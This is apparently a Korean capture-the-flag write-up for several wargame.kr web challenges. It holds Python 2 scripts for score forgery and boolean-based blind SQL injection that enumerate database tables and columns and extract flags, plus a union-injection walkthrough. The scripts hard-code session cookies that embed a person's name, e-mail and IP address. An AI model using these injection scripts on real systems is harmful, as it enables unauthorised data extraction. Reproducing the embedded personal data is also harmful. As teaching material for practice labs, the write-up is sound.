# -*- coding: utf-8 -*-
# Solver for the wargame.kr "fly_me_to_the_moon" challenge (Python 2).
# Step 1 fetches a token from token.php using the author's session;
# step 2 posts score=31337 together with that token to high-scores.php and
# prints the server's reply. The score is entirely client-supplied, so the
# only server-side control visible from here is the token check.
import urllib, urllib2, sys

# `url` is never used below; only score_url and token_url are requested.
url = "http://wargame.kr:8080/fly_me_to_the_moon/"
score_url = "http://wargame.kr:8080/fly_me_to_the_moon/high-scores.php"
token_url = "http://wargame.kr:8080/fly_me_to_the_moon/token.php"
# Browser-like User-Agent sent with every request (the literal is missing
# its closing parenthesis, which is harmless for a header value).
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): a live session id is hard-coded and was published with this
# writeup; the ci_session value below additionally carries the author's
# name, e-mail and IP address. Session material belongs in an environment
# variable or an untracked config file, never in committed/published code.
PHPSESSID = "jfovvtct42sj2atn25n902fmi7"

# --- Step 1: obtain the token expected by the score endpoint (GET). ---
req = urllib2.Request(token_url)
req.add_header("User-agent", user_agent)
# ci_session looks like a URL-encoded, serialized CodeIgniter session array
# (session_id, ip_address, user_agent, last_activity, user_data, ...)
# followed by a 40-hex-character signature; both cookies must be sent or
# the server will not associate the request with the logged-in account.
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+";"
               +"ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
# No timeout and no error handling: a non-2xx response raises HTTPError and
# a stalled connection blocks the script indefinitely.
res = urllib2.urlopen(req).read()
# --- Step 2: submit the forged score; the whole token response body is
# passed back verbatim as the `token` field. ---
dat = {'score': "31337", 'token': res}
dat = urllib.urlencode(dat)
# Passing `data` makes urllib2 issue a POST with the form-encoded body.
req = urllib2.Request(score_url,dat)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+";"
               +"ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")

# Print whatever the score endpoint returns (the flag, on success).
res = urllib2.urlopen(req).read()
print res



post로 넘어가는 값에서 인젝션이 먹힌다.

일단 소스 


# -*- coding: utf-8 -*-
# Table count: boolean-based blind SQL injection against ip_log_table/chk.php.
# For i in 0..49 the POST field idx is set to
#   17038 and if((select count(table_name) from information_schema.tables)=i,17038,0)
# When the guess is right the expression evaluates to idx=17038 and the
# page shows that log row; otherwise idx=0 presumably shows nothing useful.
#
# Defender note: every probe is a near-identical request whose idx value
# contains "information_schema" and differs in a single integer -- an easy
# WAF / access-log signature. The root-cause fix is binding idx as a query
# parameter (prepared statement) instead of concatenating it into the SQL.
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): live session cookie published with the writeup (the
# ci_session blob below also embeds name, e-mail and IP); keep such values
# out of committed code.
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

# Upper bound 50 is a guess; a schema with 50+ tables would never match.
for i in range(50):
    dat = {'idx': "17038 and if((select count(table_name) from information_schema.tables)="+str(i)+",17038,0)"}
    dat = urllib.urlencode(dat)
    # Supplying `data` makes this a POST with a form-encoded body.
    req = urllib2.Request(url,dat)
    req.add_header("User-agent", user_agent)
    req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
    # No timeout / error handling: an HTTPError aborts the whole loop.
    res = urllib2.urlopen(req).read()

    # True-marker: a timestamp from the author's own log row (idx 17038).
    # It is session-specific and has to be re-read for any other account.
    if "2017-02-23 19:47:27" in res:
        print "[*]Find tables count! : " + str(i)
        break
        # NOTE(review): unreachable -- `break` has already left the loop.
        sys.exit(1)
# -*- coding: utf-8 -*-
# Table names: character-by-character blind extraction of table_name from
# information_schema.tables, one LIMIT offset (n) at a time.
#   n : row offset 40..42 (the last three entries of the listing)
#   i : character position passed to substring()
#   j : candidate character code, compared as a hex literal (0x..)
# The same true-marker as the count script (the author's log timestamp)
# tells a hit from a miss.
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): live session cookie published with the writeup; keep such
# values out of committed code.
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

n = 40
while n < 43:
    # `flag` accumulates the recovered table name (the name is misleading:
    # this script extracts table names, not the flag).
    flag = ""
    # NOTE(review): MySQL substring() positions are 1-based and position 0
    # yields '', so the i=0 pass can never match; the later scripts on this
    # page use str(i+1) instead.
    for i in range(40):
        # range(36,90) covers '$'..'Y': 'Z', '_' and lowercase letters are
        # outside it, so names containing them cannot be fully recovered
        # here (presumably a case-insensitive collation makes the
        # uppercase hits stand in for lowercase -- confirm).
        for j in range(36,90):
            # hex(j)[2:] strips Python's "0x" prefix; "0x"+.. rebuilds the
            # MySQL hex-literal form so no quotes are needed in the payload.
            dat = {'idx': "17038 and if(substring((select table_name from information_schema.tables limit "+str(n)+",1),"+str(i)+",1)="+"0x"+hex(j)[2:]+",17038,0)"}
            dat = urllib.urlencode(dat)
            req = urllib2.Request(url,dat)
            req.add_header("User-agent", user_agent)
            req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                        + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
            # No timeout / error handling; one HTTPError aborts everything.
            res = urllib2.urlopen(req).read()

            if "2017-02-23 19:47:27" in res:
                flag += chr(j)
                print "[+]Find! : " + chr(j)
                # First matching character wins; move to the next position.
                # A position with no match at all (end of name) is silently
                # skipped, so the loop always runs all 40 positions.
                break
                # NOTE(review): unreachable after `break`.
                sys.exit(1)
    print "[*]Find flag! : " + flag
    n += 1
# Column name -- despite the heading this is a single yes/no probe: it checks
# whether information_schema.columns holds exactly 486 rows, using the same
# if(cond, idx, 0) oracle as the table-count script above. The response body
# is printed raw; the author compares it by eye against the normal page.
import urllib, urllib2

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): live session cookie published with the writeup; note the
# ci_session blob below is a different (a:10) session than in the scripts
# above. Keep such values out of committed code.
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

# idx 17053 here (17038 in the earlier scripts): a different log row.
dat = {'idx': "17053  and if((select count(column_name) from information_schema.columns)=486,17053,0)"}
dat = urllib.urlencode(dat)
req = urllib2.Request(url,dat)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229c4639bdd4c2b4e5fdd6c246f1e79011%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487934026%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3B%7Dba943cf039368323def355883b41fbefa82da0c6")
# No timeout / error handling.
res = urllib2.urlopen(req).read()
print res


# Table injection
# -*-coding:utf8 -*-
# SimpleBoard: blind extraction of table names from information_schema.tables
# through the GET parameter idx of read.php, one LIMIT offset (n) at a time.
#   n : row offset 0..42
#   i : substring() position (0-based here, so position 0 is wasted --
#       MySQL substring() is 1-based and returns '' for 0)
#   j : candidate character code 48..96 ('0'-'9', 'A'-'Z', '_' and a few
#       punctuation marks); lowercase letters are not tried
# The payload is hand URL-encoded (%20 for spaces) because it is placed
# directly into the query string rather than going through urlencode().
#
# Defender note: the oracle string "G00d m0rn1ng~" is normal page content;
# the only thing that distinguishes these probes server-side is the SQL in
# the idx parameter, i.e. many requests differing by one integer/hex byte.

import urllib2

print "[*] start!"
n = 0
while n < 43:
    # `dat` accumulates the recovered name for offset n.
    dat = ""
    for i in range(45):
        for j in range(48,97):
            # hex(j)[2:] drops Python's "0x" prefix; the literal is sent as 0xNN.
            param = "1%20and%20substring((select%20table_name%20from%20information_schema.tables%20limit%20"+str(n)+",1),"+str(i)+",1)=0x"+hex(j)[2:]
            url = "http://wargame.kr:8080/SimpleBoard/read.php?idx="+param
            # NOTE(review): the ci_session cookie is a live, published
            # session value that also embeds name, e-mail and IP; it should
            # be read from the environment rather than committed.
            req = urllib2.Request(url, headers={'Host': 'wargame.kr:8080',
                                            'Cookie': 'ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225b072841ee99129eeeabec29e6d6df40%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F55.0.2883.75+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487497579%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%226750%22%3B%7Ded248a2ed859a72f3df787f4750c0184da001470'})
            # No timeout / error handling; an HTTPError aborts the run.
            res = urllib2.urlopen(req).read()
            # True-marker: the post body shown when idx=1 is returned.
            if "G00d m0rn1ng~" in res:
                dat += chr(j)
                break
    print "[*]Find table " + dat
    n += 1
print "[*] Finish!"
# Flag extraction
# Needs a little tweaking, but it does produce the answer.
# -*-coding:utf8 -*-
# NOTE(review): the coding declaration above is on line 3; Python only
# honours it on line 1 or 2, so this file has no effective source encoding.
#
# Same loop as the table-name script, but the inner select now reads the
# FLAG column of the README table found there. Only LIMIT offset 0 can hold
# data of interest; the outer loop nevertheless runs n from 0 to 42 (this is
# presumably the "needs tweaking" the author mentions).
import urllib2
print "[*] start!"
n = 0
while n < 43:
    # `dat` accumulates the recovered value for offset n.
    dat = ""
    # i starts at 0, which MySQL substring() treats as an empty result, so
    # the first pass never matches; positions 1..44 are the real probes.
    for i in range(45):
        # Character codes 48..96: digits, uppercase letters, '_' and a few
        # punctuation marks; lowercase letters are not tried.
        for j in range(48,97):
            param = "1%20and%20substring((select%20FLAG%20from%20README%20limit%20"+str(n)+",1),"+str(i)+",1)=0x"+hex(j)[2:]
            url = "http://wargame.kr:8080/SimpleBoard/read.php?idx="+param
            # NOTE(review): published live session cookie (with name,
            # e-mail and IP inside) -- keep out of committed code.
            req = urllib2.Request(url, headers={'Host': 'wargame.kr:8080',
                                            'Cookie': 'ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225b072841ee99129eeeabec29e6d6df40%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F55.0.2883.75+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487497579%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%226750%22%3B%7Ded248a2ed859a72f3df787f4750c0184da001470'})
            # No timeout / error handling.
            res = urllib2.urlopen(req).read()
            # True-marker: the post body that is shown when idx=1 is returned.
            if "G00d m0rn1ng~" in res:
                dat += chr(j)
                break
    print "[*]Find KEY " + dat
    n += 1
print "[*] Finish!"



문제 화면입니다. SQL injection 문제네요.



문제에 들어가보면 이렇게 테이블이 주어집니다. 간단히 기능 학습을 해보고 view-source를 눌러보겠습니다.



눈에 띄는 코드는 $_SERVER['QUERY_STRING'] 변수와 parse_str 함수입니다.

$_SERVER['QUERY_STRING']은 요청으로 넘어온 쿼리 문자열을 그대로 담고 있는 변수입니다.

ex) id=123&pw=123


그리고 parse_str은 쿼리 문자열을 파싱해서 각 인자를 php 변수로 만들어 주는 함수입니다.

따라서 get 방식으로 보낸 값들이 php변수로 저장되는것입니다.


그리고 아래의 

$col = preg_match('/^(subject|content|writer)$/isDU',$col) ? $col : '';

if($col) {

        $query_parts = $col . " like '%" . $keyword . "%'";
    }


에서 $col 변수가 preg_match를 통과하지 못하도록(false가 되도록) 만든 다음, $query_parts 변수 자체를 get 파라미터로 넘겨 원하는 쿼리를 넣으면 문제를 풀 수 있습니다.



query_parts = 1 union select 1,2,3,4 -- 를 입력하면 1234가 나옵니다. 이제 table_name을 뽑아보도록 하겠습니다.


information_schema에서 table 목록들을 뽑았습니다. 플래그가 있을법한 테이블이 하나 있네요.



테이블 이름은 Th1s_1s_Flag_tbl 입니다. 이제 칼럼 목록을 뽑아보겠습니다.



column_type과 column_name을 같이 뽑았습니다. 



f1ag 칼럼이 있네요 이제 테이블과 칼럼을 알았으니 칼럼에 있는 값을 뽑겠습니다.



flag가 나왔습니다.





문제 화면입니다.

sql injection 문제네요. 개발자 관점에서 생각해보라는 힌트가 주어졌습니다.



아이디를 입력하는 창이 나옵니다. 아무거나 입력보겠습니다.



간단한 채팅 화면이 나옵니다. 입력하면 조금의 딜레이가 있은 후 채팅이 실시간으로 보여집니다.



소스코드에서 chatlog.php?t=1을 해보면 어떤 수가 나옵니다. 채팅을 또 친 후 들어가보면 수가 늘어나 있습니다. 아마 현재까지 누적된 채팅 수와 관련이 있는것 같습니다.



소스코드에 나온대로 chatview.php?t=1&ni= 에서 20808을 입력하니 아무것도 안뜹니다. 하지만 20807을 넣으면 방금 입력한 채팅이 나옵니다.

그리고 20806을 입력하면 그 전 채팅까지 총 두개가 나옵니다. 

따라서 ni에 값을 입력하면 (제일 마지막에 입력한 채팅 number - 입력한 값) 까지 해서 그 수만큼 보여주는거로 추정됩니다.




그리고 ni에 인젝션을 시도해봤는데 먹히는걸로 봐선 이 부분을 통해 문제를 풀어야할것 같습니다.


union을 통해 select 해오겠습니다.



union으로 select 하려면 앞쪽 select의 칼럼 수와 맞춰줘야 하므로 개수를 늘려가며 시도해보니, 다섯 개를 select 하면 결과가 나옵니다.


제일 아래에 chat_log_secret이 제일 의심가는 테이블입니다. 연습을 위해 파이썬으로 테이블 개수를 가져오고 거기서 테이블명, 더 나아가 칼럼을 구해보도록 하겠습니다.







# Table count
# web_chatting: boolean-based blind probe through the ni parameter of
# chatview.php. For i in 0..49 the condition
#   (select count(table_name) from information_schema.tables) = i
# is wrapped in if(cond, 20798, 5555555): a hit reproduces the page for
# ni=20798 (a known chat number), a miss uses 5555555, which presumably maps
# to no chat row and renders an empty page.
#
# Defender note: the oracle string "font-size:12px;" is ordinary page CSS;
# what makes these probes recognisable server-side is the SQL carried in
# the ni parameter (dozens of requests differing in a single integer).
# Binding ni as a query parameter removes the injection entirely.
import urllib2, re, sys 

print "[+] Start!"
for i in range(50):
        dat = "t=1&ni=20798%20and%20if((select%20count(table_name)%20from%20information_schema.tables)="+str(i)+",20798,5555555)"
        url = "http://wargame.kr:8080/web_chatting/chatview.php?" + dat 
        # NOTE(review): the ci_session value is a live, published session
        # cookie that also embeds name, e-mail and IP; it belongs in an
        # environment variable, not in committed code.
        req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
        # No timeout / error handling; an HTTPError aborts the loop.
        res = urllib2.urlopen(req).read()
        # True-marker: a chat row was rendered, i.e. the guess was correct.
        if "font-size:12px;" in res:
                print "[+] SUCCESS!"
                print "[*] counting : " + str(i)
                break
                # NOTE(review): unreachable after `break`; `re` is unused.
                sys.exit(1)    



테이블의 개수는 0부터 41인덱스 까지 42개입니다.


# Table name extraction
# Character-by-character blind extraction of table_name from
# information_schema.tables for LIMIT offsets 0..41 (the 42 tables counted
# above). Uses the same if(cond, 20798, 5555555) oracle on the ni parameter.
#   i+1 : 1-based substring() position (1..40)
#   j   : candidate character code 48..96 ('0'-'9', 'A'-'Z', '_' and some
#         punctuation); lowercase letters are not tried
import urllib2, re

n = 0 
print "[+] Start!"
while(n<42):
        # `table` accumulates the recovered name for offset n.
        table = ""
        for i in range(40):
                for j in range(48,97):
                        # "limit%20+<n>": the '+' decodes to a space in the
                        # query string, so the SQL reads "limit  n,1".
                        # hex(j)[2:] drops Python's "0x" prefix; sent as 0xNN.
                        dat = "t=1&ni=20798%20and%20if(substring((select%20table_name%20from%20information_schema.tables%20limit%20+"+str(n)+",1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,5555555)"
                        url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
                        # NOTE(review): published live session cookie (name,
                        # e-mail and IP embedded) -- keep out of committed code.
                        req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
                        # No timeout / error handling.
                        res = urllib2.urlopen(req).read()
                        # True-marker: a chat row was rendered, so the
                        # character at this position matched.
                        if "font-size:12px;" in res:
                                table += chr(j)
                                break
        print "find table : " + table
        n += 1
print "[+] Finish!"


제일 아래의 chat_log_secret 테이블이 나옵니다.


이제 칼럼의 수를 구해보겠습니다.


# Column count
# Same blind probe as the table-count script, but against
# information_schema.columns, with the guess range widened to 0..499.
import urllib2, re, sys 

print "[+] Start!"
for i in range(500):
        dat = "t=1&ni=20798%20and%20if((select%20count(column_name)%20from%20information_schema.columns)="+str(i)+",20798,5555555)"
        url = "http://wargame.kr:8080/web_chatting/chatview.php?" + dat 
        # NOTE(review): published live session cookie (name, e-mail and IP
        # embedded) -- keep out of committed code.
        req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
        # No timeout / error handling; up to 500 sequential requests.
        res = urllib2.urlopen(req).read()
        # True-marker: a chat row was rendered, i.e. the guess was correct.
        if "font-size:12px;" in res:
                print "[+] SUCCESS!"
                print "[*] counting : " + str(i)
                break
                # NOTE(review): unreachable after `break`; `re` is unused.
                sys.exit(1)


486개의 칼럼이 존재합니다. 이제 칼럼 이름을 알아내보도록 하겠습니다.



# Column names
# Same extraction loop as the table-name script, reading column_name from
# information_schema.columns for LIMIT offsets 0..486.
# NOTE(review): the count script found 486 columns, so n<487 runs one offset
# past the end (the last pass simply finds nothing). Only urllib2 is used;
# urllib, re, sys, time and os are imported but unused.
import urllib, urllib2, re, sys, time, os

n = 0 
print "[+] Start!"
while(n<487):
        # `column` accumulates the recovered name for offset n.
        column = ""
        for i in range(40):
                for j in range(48,97):
                        dat = "t=1&ni=20798%20and%20if(substring((select%20column_name%20from%20information_schema.columns%20limit%20+"+str(n)+",1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,5555555)"
                        url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
                        # NOTE(review): published live session cookie (name,
                        # e-mail and IP embedded) -- keep out of committed code.
                        req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
                        # No timeout / error handling.
                        res = urllib2.urlopen(req).read()
                        if "font-size:12px;" in res:
                                column += chr(j)
                                break
        # NOTE(review): BUG -- `key` is never defined in this script, so this
        # line raises NameError after the first offset; the accumulated value
        # is in `column`.
        print "find column : " + key 
        n += 1
print "[+] Finish!"

의심가는 칼럼은 readme입니다.



테이블과 칼럼을 구했으니 플래그를 구해보겠습니다.




# Flag: blind extraction of the readme column of chat_log_secret (first row
# only, "limit 0,1"), one character per position 1..40, using the same
# if(cond, 20798, ...) oracle on the ni parameter. The else-value is 55555
# here rather than 5555555; either way it presumably selects no chat row.
